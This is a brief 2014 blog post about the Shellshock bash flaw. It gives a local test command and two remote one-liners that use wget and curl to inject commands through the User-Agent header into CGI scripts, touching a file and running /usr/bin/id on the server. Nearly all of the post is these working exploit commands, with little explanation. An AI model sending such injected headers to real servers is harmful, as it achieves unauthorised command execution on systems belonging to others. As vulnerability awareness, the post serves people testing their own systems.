Thursday, September 25, 2014

with a rusty spoon

well kids. this just sucks donkey balls. get shell and issue:
 env x='() { :;}; echo vulnerable' bash -c "echo this is a test"  
if you see vulnerable you're in a bad trip.
it gets better. say you have cgi-bin enabled and not in perl taint mode. run this:
 wget -U "() {test;}; `which touch` /tmp/VULNERABLE" http://server/cgi-bin/valid.cgi  

and better.

curl -A '() { :;}; echo Content-Type: text/html; echo; echo `/usr/bin/id`' http://yourserver/your.cgi

with a rusty spoon.
Post a Comment